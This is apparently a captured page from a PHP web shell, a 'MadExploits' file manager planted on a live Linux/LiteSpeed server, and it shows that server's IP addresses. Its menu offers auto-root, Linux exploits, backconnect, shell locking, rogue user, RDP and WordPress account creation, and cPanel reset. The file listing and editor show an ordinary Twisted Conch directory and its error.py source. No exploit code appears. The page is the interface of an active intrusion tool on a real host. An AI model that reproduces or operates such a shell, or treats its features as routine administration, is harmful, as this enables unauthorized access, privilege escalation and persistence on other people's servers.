Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
twisted /
conch /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
client
[ DIR ]
drwxr-xr-x
insults
[ DIR ]
drwxr-xr-x
openssh_compat
[ DIR ]
drwxr-xr-x
scripts
[ DIR ]
drwxr-xr-x
ssh
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
ui
[ DIR ]
drwxr-xr-x
__init__.py
198
B
-rw-r--r--
avatar.py
1.6
KB
-rw-r--r--
checkers.py
18.97
KB
-rw-r--r--
endpoints.py
29.26
KB
-rw-r--r--
error.py
2.6
KB
-rw-r--r--
interfaces.py
14.57
KB
-rw-r--r--
ls.py
2.63
KB
-rw-r--r--
manhole.py
11.57
KB
-rw-r--r--
manhole_ssh.py
4.32
KB
-rw-r--r--
manhole_tap.py
5.36
KB
-rw-r--r--
mixin.py
1.34
KB
-rw-r--r--
recvline.py
18.71
KB
-rw-r--r--
stdio.py
2.71
KB
-rw-r--r--
tap.py
3.12
KB
-rw-r--r--
telnet.py
37.16
KB
-rw-r--r--
ttymodes.py
2.14
KB
-rw-r--r--
unix.py
16.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : error.py
# Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ An error to represent bad things happening in Conch. Maintainer: Paul Swartz """ from twisted.cred.error import UnauthorizedLogin class ConchError(Exception): def __init__(self, value, data=None): Exception.__init__(self, value, data) self.value = value self.data = data class NotEnoughAuthentication(Exception): """ This is thrown if the authentication is valid, but is not enough to successfully verify the user. i.e. don't retry this type of authentication, try another one. """ class ValidPublicKey(UnauthorizedLogin): """ Raised by public key checkers when they receive public key credentials that don't contain a signature at all, but are valid in every other way. (e.g. the public key matches one in the user's authorized_keys file). Protocol code (eg L{SSHUserAuthServer<twisted.conch.ssh.userauth.SSHUserAuthServer>}) which attempts to log in using L{ISSHPrivateKey<twisted.cred.credentials.ISSHPrivateKey>} credentials should be prepared to handle a failure of this type by telling the user to re-authenticate using the same key and to include a signature with the new attempt. See U{http://www.ietf.org/rfc/rfc4252.txt} section 7 for more details. """ class IgnoreAuthentication(Exception): """ This is thrown to let the UserAuthServer know it doesn't need to handle the authentication anymore. """ class MissingKeyStoreError(Exception): """ Raised if an SSHAgentServer starts receiving data without its factory providing a keys dict on which to read/write key data. """ class UserRejectedKey(Exception): """ The user interactively rejected a key. """ class InvalidEntry(Exception): """ An entry in a known_hosts file could not be interpreted as a valid entry. """ class HostKeyChanged(Exception): """ The host key of a remote host has changed. @ivar offendingEntry: The entry which contains the persistent host key that disagrees with the given host key. @type offendingEntry: L{twisted.conch.interfaces.IKnownHostEntry} @ivar path: a reference to the known_hosts file that the offending entry was loaded from @type path: L{twisted.python.filepath.FilePath} @ivar lineno: The line number of the offending entry in the given path. @type lineno: L{int} """ def __init__(self, offendingEntry, path, lineno): Exception.__init__(self) self.offendingEntry = offendingEntry self.path = path self.lineno = lineno
Close